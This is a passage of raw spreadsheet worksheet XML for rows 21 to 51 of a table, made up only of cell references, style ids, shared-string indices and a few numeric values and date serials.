      <c r="K21" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L21" t="s">
        <v>77</v>
      </c>
      <c r="P21" t="s">
        <v>181</v>
      </c>
      <c r="Q21" s="95" t="s">
        <v>182</v>
      </c>
      <c r="W21" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="22" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A22" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B22" s="52"/>
      <c r="C22" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D22" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E22" s="95" t="s">
        <v>183</v>
      </c>
      <c r="F22" s="42">
        <v>100</v>
      </c>
      <c r="G22" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H22" t="s">
        <v>184</v>
      </c>
      <c r="I22" t="s">
        <v>185</v>
      </c>
      <c r="J22" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K22" s="95" t="s">
        <v>16</v>
      </c>
      <c r="L22" t="s">
        <v>83</v>
      </c>
      <c r="M22" s="95" t="s">
        <v>72</v>
      </c>
      <c r="P22" t="s">
        <v>187</v>
      </c>
      <c r="Q22" s="95" t="s">
        <v>188</v>
      </c>
      <c r="W22" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="23" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A23" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B23" s="52"/>
      <c r="C23" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D23" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E23" s="95" t="s">
        <v>189</v>
      </c>
      <c r="F23" s="42">
        <v>100</v>
      </c>
      <c r="G23" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H23" t="s">
        <v>190</v>
      </c>
      <c r="I23" t="s">
        <v>172</v>
      </c>
      <c r="J23" s="95" t="s">
        <v>173</v>
      </c>
      <c r="K23" s="95" t="s">
        <v>13</v>
      </c>
      <c r="L23" t="s">
        <v>83</v>
      </c>
      <c r="M23" s="95" t="s">
        <v>72</v>
      </c>
      <c r="N23" t="s">
        <v>174</v>
      </c>
      <c r="Q23" s="95" t="s">
        <v>191</v>
      </c>
      <c r="W23" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="24" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A24" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B24" s="52"/>
      <c r="C24" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D24" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E24" s="95" t="s">
        <v>192</v>
      </c>
      <c r="F24" s="42">
        <v>100</v>
      </c>
      <c r="G24" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H24" t="s">
        <v>193</v>
      </c>
      <c r="I24" t="s">
        <v>75</v>
      </c>
      <c r="J24" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K24" s="95" t="s">
        <v>15</v>
      </c>
      <c r="L24" t="s">
        <v>83</v>
      </c>
      <c r="M24" s="95" t="s">
        <v>90</v>
      </c>
      <c r="N24" t="s">
        <v>167</v>
      </c>
      <c r="P24" t="s">
        <v>168</v>
      </c>
      <c r="Q24" s="95" t="s">
        <v>194</v>
      </c>
      <c r="W24" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="25" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A25" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B25" s="52"/>
      <c r="C25" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D25" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E25" s="95" t="s">
        <v>195</v>
      </c>
      <c r="F25" s="42">
        <v>100</v>
      </c>
      <c r="G25" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H25" t="s">
        <v>195</v>
      </c>
      <c r="I25" t="s">
        <v>196</v>
      </c>
      <c r="J25" s="95" t="s">
        <v>197</v>
      </c>
      <c r="K25" s="95" t="s">
        <v>18</v>
      </c>
      <c r="L25" t="s">
        <v>77</v>
      </c>
      <c r="M25" s="95" t="s">
        <v>18</v>
      </c>
      <c r="N25" t="s">
        <v>198</v>
      </c>
      <c r="Q25" s="95" t="s">
        <v>176</v>
      </c>
      <c r="W25" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="26" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A26" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B26" s="52">
        <v>44396.621348773151</v>
      </c>
      <c r="C26" s="95" t="s">
        <v>199</v>
      </c>
      <c r="D26" s="96">
        <v>101</v>
      </c>
      <c r="E26" s="95" t="s">
        <v>200</v>
      </c>
      <c r="F26" s="42">
        <v>101</v>
      </c>
      <c r="G26" s="95" t="s">
        <v>201</v>
      </c>
      <c r="H26" t="s">
        <v>202</v>
      </c>
      <c r="I26" t="s">
        <v>203</v>
      </c>
      <c r="J26" s="95" t="s">
        <v>204</v>
      </c>
      <c r="K26" s="95" t="s">
        <v>16</v>
      </c>
      <c r="L26" t="s">
        <v>83</v>
      </c>
      <c r="M26" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q26" s="95" t="s">
        <v>161</v>
      </c>
      <c r="W26" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="27" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A27" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B27" s="52">
        <v>43883.342491793985</v>
      </c>
      <c r="C27" s="95" t="s">
        <v>199</v>
      </c>
      <c r="D27" s="96">
        <v>110</v>
      </c>
      <c r="E27" s="95" t="s">
        <v>205</v>
      </c>
      <c r="F27" s="42">
        <v>110</v>
      </c>
      <c r="G27" s="95" t="s">
        <v>206</v>
      </c>
      <c r="H27" t="s">
        <v>202</v>
      </c>
      <c r="I27" t="s">
        <v>203</v>
      </c>
      <c r="J27" s="95" t="s">
        <v>204</v>
      </c>
      <c r="K27" s="95" t="s">
        <v>16</v>
      </c>
      <c r="L27" t="s">
        <v>83</v>
      </c>
      <c r="M27" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q27" s="95" t="s">
        <v>207</v>
      </c>
      <c r="R27">
        <v>2</v>
      </c>
      <c r="S27">
        <v>4</v>
      </c>
      <c r="T27">
        <v>2632</v>
      </c>
      <c r="U27">
        <v>3818</v>
      </c>
      <c r="V27">
        <v>144415</v>
      </c>
      <c r="W27" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="28" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A28" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B28" s="52"/>
      <c r="C28" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D28" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E28" s="95" t="s">
        <v>209</v>
      </c>
      <c r="F28" s="42">
        <v>100</v>
      </c>
      <c r="G28" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H28" t="s">
        <v>209</v>
      </c>
      <c r="I28" t="s">
        <v>210</v>
      </c>
      <c r="J28" s="95" t="s">
        <v>211</v>
      </c>
      <c r="K28" s="95" t="s">
        <v>30</v>
      </c>
      <c r="L28" t="s">
        <v>83</v>
      </c>
      <c r="M28" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q28" s="95" t="s">
        <v>176</v>
      </c>
      <c r="W28" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="29" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A29" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B29" s="52"/>
      <c r="C29" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D29" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E29" s="95" t="s">
        <v>212</v>
      </c>
      <c r="F29" s="42">
        <v>100</v>
      </c>
      <c r="G29" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H29" t="s">
        <v>213</v>
      </c>
      <c r="I29" t="s">
        <v>75</v>
      </c>
      <c r="J29" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K29" s="95" t="s">
        <v>15</v>
      </c>
      <c r="L29" t="s">
        <v>83</v>
      </c>
      <c r="M29" s="95" t="s">
        <v>90</v>
      </c>
      <c r="N29" t="s">
        <v>167</v>
      </c>
      <c r="P29" t="s">
        <v>214</v>
      </c>
      <c r="Q29" s="95" t="s">
        <v>215</v>
      </c>
      <c r="W29" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="30" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A30" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B30" s="52"/>
      <c r="C30" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D30" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E30" s="95" t="s">
        <v>216</v>
      </c>
      <c r="F30" s="42">
        <v>100</v>
      </c>
      <c r="G30" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H30" t="s">
        <v>217</v>
      </c>
      <c r="I30" t="s">
        <v>75</v>
      </c>
      <c r="J30" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K30" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L30" t="s">
        <v>77</v>
      </c>
      <c r="M30" s="95" t="s">
        <v>76</v>
      </c>
      <c r="Q30" s="95" t="s">
        <v>218</v>
      </c>
      <c r="W30" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="31" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A31" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B31" s="52"/>
      <c r="C31" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D31" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E31" s="95" t="s">
        <v>219</v>
      </c>
      <c r="F31" s="42">
        <v>100</v>
      </c>
      <c r="G31" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H31" t="s">
        <v>220</v>
      </c>
      <c r="I31" t="s">
        <v>75</v>
      </c>
      <c r="J31" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K31" s="95" t="s">
        <v>15</v>
      </c>
      <c r="L31" t="s">
        <v>83</v>
      </c>
      <c r="M31" s="95" t="s">
        <v>90</v>
      </c>
      <c r="N31" t="s">
        <v>221</v>
      </c>
      <c r="P31" t="s">
        <v>222</v>
      </c>
      <c r="Q31" s="95" t="s">
        <v>223</v>
      </c>
      <c r="W31" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="32" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A32" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B32" s="52"/>
      <c r="C32" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D32" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E32" s="95" t="s">
        <v>224</v>
      </c>
      <c r="F32" s="42">
        <v>100</v>
      </c>
      <c r="G32" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H32" t="s">
        <v>225</v>
      </c>
      <c r="I32" t="s">
        <v>156</v>
      </c>
      <c r="J32" s="95" t="s">
        <v>226</v>
      </c>
      <c r="K32" s="95" t="s">
        <v>27</v>
      </c>
      <c r="L32" t="s">
        <v>77</v>
      </c>
      <c r="M32" s="95" t="s">
        <v>227</v>
      </c>
      <c r="N32" t="s">
        <v>228</v>
      </c>
      <c r="Q32" s="95" t="s">
        <v>229</v>
      </c>
      <c r="W32" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="33" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A33" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B33" s="52"/>
      <c r="C33" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D33" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E33" s="95" t="s">
        <v>230</v>
      </c>
      <c r="F33" s="42">
        <v>100</v>
      </c>
      <c r="G33" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H33" t="s">
        <v>231</v>
      </c>
      <c r="I33" t="s">
        <v>196</v>
      </c>
      <c r="J33" s="95" t="s">
        <v>197</v>
      </c>
      <c r="K33" s="95" t="s">
        <v>18</v>
      </c>
      <c r="L33" t="s">
        <v>77</v>
      </c>
      <c r="M33" s="95" t="s">
        <v>18</v>
      </c>
      <c r="N33" t="s">
        <v>198</v>
      </c>
      <c r="P33" t="s">
        <v>232</v>
      </c>
      <c r="Q33" s="95" t="s">
        <v>233</v>
      </c>
      <c r="W33" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="34" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A34" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B34" s="52"/>
      <c r="C34" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D34" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E34" s="95" t="s">
        <v>234</v>
      </c>
      <c r="F34" s="42">
        <v>100</v>
      </c>
      <c r="G34" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H34" t="s">
        <v>235</v>
      </c>
      <c r="I34" t="s">
        <v>75</v>
      </c>
      <c r="J34" s="95" t="s">
        <v>236</v>
      </c>
      <c r="K34" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L34" t="s">
        <v>77</v>
      </c>
      <c r="M34" s="95" t="s">
        <v>237</v>
      </c>
      <c r="N34" t="s">
        <v>238</v>
      </c>
      <c r="Q34" s="95" t="s">
        <v>239</v>
      </c>
      <c r="W34" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="35" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A35" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B35" s="52"/>
      <c r="C35" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D35" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E35" s="95" t="s">
        <v>240</v>
      </c>
      <c r="F35" s="42">
        <v>100</v>
      </c>
      <c r="G35" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H35" t="s">
        <v>241</v>
      </c>
      <c r="I35" t="s">
        <v>196</v>
      </c>
      <c r="J35" s="95" t="s">
        <v>197</v>
      </c>
      <c r="K35" s="95" t="s">
        <v>18</v>
      </c>
      <c r="L35" t="s">
        <v>77</v>
      </c>
      <c r="M35" s="95" t="s">
        <v>18</v>
      </c>
      <c r="N35" t="s">
        <v>198</v>
      </c>
      <c r="P35" t="s">
        <v>242</v>
      </c>
      <c r="Q35" s="95" t="s">
        <v>243</v>
      </c>
      <c r="W35" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="36" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A36" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B36" s="52"/>
      <c r="C36" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D36" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E36" s="95" t="s">
        <v>244</v>
      </c>
      <c r="F36" s="42">
        <v>300</v>
      </c>
      <c r="G36" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H36" t="s">
        <v>245</v>
      </c>
      <c r="I36" t="s">
        <v>103</v>
      </c>
      <c r="J36" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K36" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L36" t="s">
        <v>77</v>
      </c>
      <c r="M36" s="95" t="s">
        <v>104</v>
      </c>
      <c r="P36" t="s">
        <v>246</v>
      </c>
      <c r="Q36" s="95" t="s">
        <v>247</v>
      </c>
      <c r="W36" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="37" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A37" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B37" s="52"/>
      <c r="C37" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D37" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E37" s="95" t="s">
        <v>248</v>
      </c>
      <c r="F37" s="42">
        <v>100</v>
      </c>
      <c r="G37" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H37" t="s">
        <v>249</v>
      </c>
      <c r="K37" s="95" t="s">
        <v>38</v>
      </c>
      <c r="L37" t="s">
        <v>38</v>
      </c>
      <c r="M37" s="95" t="s">
        <v>38</v>
      </c>
      <c r="N37" t="s">
        <v>38</v>
      </c>
      <c r="P37" t="s">
        <v>250</v>
      </c>
      <c r="Q37" s="95" t="s">
        <v>251</v>
      </c>
      <c r="W37" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="38" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A38" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B38" s="52"/>
      <c r="C38" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D38" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E38" s="95" t="s">
        <v>252</v>
      </c>
      <c r="F38" s="42">
        <v>100</v>
      </c>
      <c r="G38" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H38" t="s">
        <v>253</v>
      </c>
      <c r="I38" t="s">
        <v>75</v>
      </c>
      <c r="J38" s="95" t="s">
        <v>236</v>
      </c>
      <c r="K38" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L38" t="s">
        <v>77</v>
      </c>
      <c r="M38" s="95" t="s">
        <v>254</v>
      </c>
      <c r="P38" t="s">
        <v>255</v>
      </c>
      <c r="Q38" s="95" t="s">
        <v>256</v>
      </c>
      <c r="W38" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="39" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A39" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B39" s="52"/>
      <c r="C39" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D39" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E39" s="95" t="s">
        <v>257</v>
      </c>
      <c r="F39" s="42">
        <v>100</v>
      </c>
      <c r="G39" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H39" t="s">
        <v>258</v>
      </c>
      <c r="K39" s="95" t="s">
        <v>38</v>
      </c>
      <c r="L39" t="s">
        <v>38</v>
      </c>
      <c r="M39" s="95" t="s">
        <v>38</v>
      </c>
      <c r="N39" t="s">
        <v>38</v>
      </c>
      <c r="P39" t="s">
        <v>259</v>
      </c>
      <c r="Q39" s="95" t="s">
        <v>176</v>
      </c>
      <c r="W39" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="40" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A40" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B40" s="52"/>
      <c r="C40" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D40" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E40" s="95" t="s">
        <v>260</v>
      </c>
      <c r="F40" s="42">
        <v>100</v>
      </c>
      <c r="G40" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H40" t="s">
        <v>261</v>
      </c>
      <c r="I40" t="s">
        <v>31</v>
      </c>
      <c r="J40" s="95" t="s">
        <v>262</v>
      </c>
      <c r="K40" s="95" t="s">
        <v>31</v>
      </c>
      <c r="L40" t="s">
        <v>77</v>
      </c>
      <c r="M40" s="95" t="s">
        <v>262</v>
      </c>
      <c r="N40" t="s">
        <v>263</v>
      </c>
      <c r="P40" t="s">
        <v>264</v>
      </c>
      <c r="Q40" s="95" t="s">
        <v>265</v>
      </c>
      <c r="W40" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="41" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A41" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B41" s="52"/>
      <c r="C41" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D41" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E41" s="95" t="s">
        <v>266</v>
      </c>
      <c r="F41" s="42">
        <v>200</v>
      </c>
      <c r="G41" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H41" t="s">
        <v>267</v>
      </c>
      <c r="I41" t="s">
        <v>268</v>
      </c>
      <c r="J41" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K41" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L41" t="s">
        <v>77</v>
      </c>
      <c r="M41" s="95" t="s">
        <v>270</v>
      </c>
      <c r="N41" t="s">
        <v>271</v>
      </c>
      <c r="P41" t="s">
        <v>272</v>
      </c>
      <c r="Q41" s="95" t="s">
        <v>273</v>
      </c>
      <c r="W41" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="42" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A42" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B42" s="52"/>
      <c r="C42" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D42" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E42" s="95" t="s">
        <v>266</v>
      </c>
      <c r="F42" s="42">
        <v>110</v>
      </c>
      <c r="G42" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H42" t="s">
        <v>274</v>
      </c>
      <c r="I42" t="s">
        <v>268</v>
      </c>
      <c r="J42" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K42" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L42" t="s">
        <v>77</v>
      </c>
      <c r="M42" s="95" t="s">
        <v>270</v>
      </c>
      <c r="N42" t="s">
        <v>271</v>
      </c>
      <c r="P42" t="s">
        <v>272</v>
      </c>
      <c r="Q42" s="95" t="s">
        <v>275</v>
      </c>
      <c r="W42" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="43" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A43" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B43" s="52"/>
      <c r="C43" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D43" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E43" s="95" t="s">
        <v>266</v>
      </c>
      <c r="F43" s="42">
        <v>200</v>
      </c>
      <c r="G43" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H43" t="s">
        <v>276</v>
      </c>
      <c r="I43" t="s">
        <v>268</v>
      </c>
      <c r="J43" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K43" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L43" t="s">
        <v>77</v>
      </c>
      <c r="M43" s="95" t="s">
        <v>270</v>
      </c>
      <c r="N43" t="s">
        <v>271</v>
      </c>
      <c r="P43" t="s">
        <v>272</v>
      </c>
      <c r="Q43" s="95" t="s">
        <v>277</v>
      </c>
      <c r="W43" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="44" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A44" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B44" s="52"/>
      <c r="C44" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D44" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E44" s="95" t="s">
        <v>278</v>
      </c>
      <c r="F44" s="42">
        <v>100</v>
      </c>
      <c r="G44" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H44" t="s">
        <v>279</v>
      </c>
      <c r="I44" t="s">
        <v>268</v>
      </c>
      <c r="J44" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K44" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L44" t="s">
        <v>77</v>
      </c>
      <c r="M44" s="95" t="s">
        <v>270</v>
      </c>
      <c r="N44" t="s">
        <v>271</v>
      </c>
      <c r="Q44" s="95" t="s">
        <v>280</v>
      </c>
      <c r="W44" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="45" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A45" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B45" s="52"/>
      <c r="C45" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D45" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E45" s="95" t="s">
        <v>281</v>
      </c>
      <c r="F45" s="42">
        <v>100</v>
      </c>
      <c r="G45" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H45" t="s">
        <v>282</v>
      </c>
      <c r="I45" t="s">
        <v>179</v>
      </c>
      <c r="J45" s="95" t="s">
        <v>283</v>
      </c>
      <c r="K45" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L45" t="s">
        <v>77</v>
      </c>
      <c r="P45" t="s">
        <v>284</v>
      </c>
      <c r="Q45" s="95" t="s">
        <v>176</v>
      </c>
      <c r="W45" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="46" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A46" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B46" s="52"/>
      <c r="C46" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D46" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E46" s="95" t="s">
        <v>281</v>
      </c>
      <c r="F46" s="42">
        <v>200</v>
      </c>
      <c r="G46" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H46" t="s">
        <v>282</v>
      </c>
      <c r="I46" t="s">
        <v>179</v>
      </c>
      <c r="J46" s="95" t="s">
        <v>283</v>
      </c>
      <c r="K46" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L46" t="s">
        <v>77</v>
      </c>
      <c r="P46" t="s">
        <v>284</v>
      </c>
      <c r="Q46" s="95" t="s">
        <v>285</v>
      </c>
      <c r="W46" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="47" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A47" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B47" s="52">
        <v>44767.632345694445</v>
      </c>
      <c r="C47" s="95" t="s">
        <v>286</v>
      </c>
      <c r="D47" s="96">
        <v>111</v>
      </c>
      <c r="E47" s="95" t="s">
        <v>287</v>
      </c>
      <c r="F47" s="42">
        <v>110</v>
      </c>
      <c r="G47" s="95" t="s">
        <v>288</v>
      </c>
      <c r="H47" t="s">
        <v>289</v>
      </c>
      <c r="I47" t="s">
        <v>268</v>
      </c>
      <c r="J47" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K47" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L47" t="s">
        <v>77</v>
      </c>
      <c r="M47" s="95" t="s">
        <v>290</v>
      </c>
      <c r="N47" t="s">
        <v>291</v>
      </c>
      <c r="Q47" s="95" t="s">
        <v>292</v>
      </c>
      <c r="T47">
        <v>10</v>
      </c>
      <c r="V47">
        <v>13</v>
      </c>
      <c r="W47" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="48" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A48" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B48" s="52"/>
      <c r="C48" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D48" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E48" s="95" t="s">
        <v>294</v>
      </c>
      <c r="F48" s="42">
        <v>100</v>
      </c>
      <c r="G48" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H48" t="s">
        <v>295</v>
      </c>
      <c r="I48" t="s">
        <v>268</v>
      </c>
      <c r="J48" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K48" s="95" t="s">
        <v>20</v>
      </c>
      <c r="L48" t="s">
        <v>83</v>
      </c>
      <c r="Q48" s="95" t="s">
        <v>296</v>
      </c>
      <c r="W48" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="49" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A49" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B49" s="52">
        <v>44314.160801215279</v>
      </c>
      <c r="C49" s="95" t="s">
        <v>297</v>
      </c>
      <c r="D49" s="96">
        <v>102</v>
      </c>
      <c r="E49" s="95" t="s">
        <v>298</v>
      </c>
      <c r="F49" s="42">
        <v>102</v>
      </c>
      <c r="G49" s="95" t="s">
        <v>299</v>
      </c>
      <c r="H49" t="s">
        <v>300</v>
      </c>
      <c r="I49" t="s">
        <v>156</v>
      </c>
      <c r="J49" s="95" t="s">
        <v>301</v>
      </c>
      <c r="K49" s="95" t="s">
        <v>38</v>
      </c>
      <c r="L49" t="s">
        <v>38</v>
      </c>
      <c r="M49" s="95" t="s">
        <v>38</v>
      </c>
      <c r="N49" t="s">
        <v>38</v>
      </c>
      <c r="P49" t="s">
        <v>302</v>
      </c>
      <c r="Q49" s="95" t="s">
        <v>303</v>
      </c>
      <c r="W49" t="s">
        <v>304</v>
      </c>
    </row>
    <row r="50" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A50" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B50" s="52">
        <v>44314.601553136577</v>
      </c>
      <c r="C50" s="95" t="s">
        <v>297</v>
      </c>
      <c r="D50" s="96">
        <v>202</v>
      </c>
      <c r="E50" s="95" t="s">
        <v>298</v>
      </c>
      <c r="F50" s="42">
        <v>202</v>
      </c>
      <c r="G50" s="95" t="s">
        <v>299</v>
      </c>
      <c r="H50" t="s">
        <v>305</v>
      </c>
      <c r="I50" t="s">
        <v>156</v>
      </c>
      <c r="J50" s="95" t="s">
        <v>301</v>
      </c>
      <c r="K50" s="95" t="s">
        <v>38</v>
      </c>
      <c r="L50" t="s">
        <v>38</v>
      </c>
      <c r="M50" s="95" t="s">
        <v>38</v>
      </c>
      <c r="N50" t="s">
        <v>38</v>
      </c>
      <c r="P50" t="s">
        <v>302</v>
      </c>
      <c r="Q50" s="95" t="s">
        <v>306</v>
      </c>
      <c r="R50">
        <v>939414</v>
      </c>
      <c r="S50">
        <v>768053</v>
      </c>
      <c r="T50">
        <v>2040383</v>
      </c>
      <c r="U50">
        <v>4058637</v>
      </c>
      <c r="V50">
        <v>8844910</v>
      </c>
      <c r="W50" t="s">
        <v>304</v>
      </c>
    </row>
    <row r="51" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A51" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B51" s="52">
        <v>44491.753664386575</v>
      </c>
      <c r="C51" s="95" t="s">
        <v>297</v>
      </c>
      <c r="D51" s="96">
        <v>302</v>
      </c>
      <c r="E51" s="95" t="s">
        <v>298</v>
      </c>
      <c r="F51" s="42">
        <v>302</v>
      </c>
